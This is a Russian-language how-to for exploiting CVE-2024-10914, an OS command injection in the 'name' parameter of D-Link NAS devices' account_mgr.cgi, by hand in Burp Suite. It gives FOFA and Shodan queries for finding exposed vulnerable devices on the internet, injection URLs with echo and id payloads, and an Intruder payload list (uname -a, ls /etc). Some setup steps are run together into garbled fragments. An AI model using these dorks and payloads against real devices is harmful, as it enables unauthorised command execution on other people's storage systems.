
CVE-2024-10914_Manual testing with burpsuite
Используйте следующий поисковый дорк для нахождения потенциально уязвимых устройств D-Link NAS:
FOFA:
app="D_Link-DNS-ShareCenter" && server=="lighttpd/1.4.25-devel-fb150ff"
SHODAN:
"http.title:D-Link" product:"lighttpd"
Эта поисковая строка помогает выявить устройства, работающие под управлением уязвимого приложения D-Link DNS ShareCenter с конкретной версией сервера Lighttpd, подверженной данной уязвимости.
Данное руководство предоставляет пошаговые инструкции по ручному тестированию уязвимости внедрения команд (CVE-2024-10914) в параметре name D-Link NAS с помощью Burp Suite. Целевой URL: http://Target.
127.0.0.1:8080)127.0.0.1 порт 8080.http://Target.Найдите уязвимый параметр: В перехваченном запросе найдите параметр name в URL. Он должен выглядеть следующим образом:
/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;...;%27
Вставьте тестовую команду: Измените параметр name, включив в него тестовую команду, например echo "test":
/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;echo%20%22test%22;%27
Отправьте изменённый запрос: Перешлите изменённый запрос на сервер.
Проверьте ответ: Ищите в ответе вывод внедрённой команды. Например, если сервер выполнил echo "test", вы должны увидеть:
test
Внедрите вредоносную команду: Если тест успешен, попробуйте более сложные команды, например:
/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;id;%27
Отправьте эксплойт-запрос: Перешлите этот запрос на сервер.
Проанализируйте ответ: Проверьте, присутствует ли в ответе вывод команды (например, информация об идентификаторе пользователя).
Используйте Intruder: Автоматизируйте тестирование с помощью инструмента Intruder в Burp Suite.
name как позицию для загрузки.Примеры полезных нагрузок:
echo "test"
id
uname -a
ls /etc
Запустите Intruder: Запустите атаку Intruder для автоматического тестирования нескольких полезных нагрузок.